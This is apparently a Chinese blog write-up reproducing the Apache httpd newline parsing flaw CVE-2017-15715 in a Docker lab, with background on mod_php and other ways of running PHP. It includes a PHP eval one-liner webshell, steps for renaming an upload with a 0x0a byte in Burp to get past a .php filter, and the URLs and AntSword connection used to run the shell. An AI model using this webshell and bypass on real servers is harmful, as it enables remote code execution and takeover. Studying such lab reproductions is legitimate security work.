Apache HTTPd换行解析漏洞复现CVE-2017-15715
漏洞利用
漏洞利用条件
Apache: 2.4.0~2.4.29
实际存到后端时的文件名可控
漏洞利用方式
bp中更改存放到后端的文件名
假设
原文件名为"evil.php" 文件存放在网站根目录下 evil.php的内容为: <?php @eval($_REQUEST[1]); ?>操作:
先将"evil.php"改成"evil.php "即"evil.php[0x20]" 然后通过hex将其改为"evil.php[0x0a]" URL访问:http://ip/evil.php%0a?1=phpinfo(); 或蚁剑连接:http://ip/evil.php%0a ,密码是1
前置知识
-
当我们提到
Apache HTTP Server时,通常指的是整个软件包,它包括了HTTP服务器的核心功能、模块化架构、配置文件、运行时环境等。Apache HTTP Server 提供了完整的 Web 服务器解决方案,可以用于托管和提供网站内容。 -
而
httpd则是 Apache HTTP Server 的具体可执行程序的名称(通常在 Unix/Linux 系统上)。通过运行 httpd守护进程,Apache HTTP Server 开始监听指定的端口(例如默认的80端口),接收来自客户端的HTTP请求,并根据配置文件进行相应的处理和响应。 -
httpd可以通过mod_php来运行PHP网页。其存在一个解析漏洞,在解析PHP时,如1.php0x0A将被按照1.php进行解析,导致绕过一些服务器的安全策略。 -
mod_php 是 Apache 的一个模块,它允许将 PHP 解释器嵌入到 Apache 的进程中,并通过该模块将 PHP 代码集成到 Apache 的请求处理流程中。当 Apache 收到一个包含 PHP 代码的网页请求时,mod_php 模块负责解析该请求,将 PHP 代码交给 PHP 解释器进行解释执行,然后将执行结果返回给客户端浏览器。
当然,除了mod_php,还存在其他方式来运行PHP网页:
1.PHP-FPM(PHP FastCGI Process Manager):PHP-FPM 是一个独立的进程管理器,通过 FastCGI 协议与 Web 服务器(例如 Apache 或 Nginx)进行通信。PHP-FPM 可以独立于 Web 服务器运行,提供更高的性能和灵活性。
2.CGI(Common Gateway Interface):CGI 是一种标准的 Web 服务器和应用程序之间的接口协议。通过将 PHP 解释器
作为 CGI 程序来运行 PHP 网页,Web 服务器可以通过 CGI 协议与 PHP 解释器进行通信并执行 PHP 代码。
3.FastCGI:FastCGI 是一种改进的 CGI 协议,它使用长连接和进程池的方式提高了性能。类似于 CGI,FastCGI 可以将
PHP 解释器作为独立的进程来运行 PHP 网页,并通过协议与 Web 服务器进行通信
怎么选择?
这些方法都可以用来运行 PHP 网页,选择哪种方法取决于你的需求和配置。例如,mod_php 对于简单的 PHP 应用程序和较小的网站是一个简便且高效的选择,而 PHP-FPM 和 FastCGI 则适用于更大型、高流量的网站,提供更好的性能和可扩展性。
环境配置
find ./ -name *CVE-2017*
cd ./httpd/CVE-2017-15715
docker-compose build
docker-compose up -d
docker ps # 8080端口
漏洞复现
访问8080端口得:
尝试直接提交木马文件:
试着将php改为txt试试:
说明过滤的是.php
根据漏洞,1.php[0x0a]和1.php具有相同的效果,所以尝试绕过:
原来:"eval_POST2.php"
先改成:"eval_POST2.php "即:"eval_POST2.php[0x20]"
然后通过Hex,将其改为"eval_POST2.php[0x0a]"
改完后发送
回显:
payload:
http://192.168.40.148:8080/evil.php%0a?1=phpinfo();
顺便查看后端的情况:
docker exec <ID> /bin/bash
ls
cat e*
蚁剑连接:
问:直接在bp的evil.php后换行可以吗?
答:
我们来看看直接换行后是什么
Hex:
URL访问:
没有出现404,但是也没有解析一句话木马
蚁剑也是一样:
来看看后台:可见一句话木马并没有什么异常
所以还是通过Hex得出0a比较好
如果有大佬知道怎么解释,欢迎留言
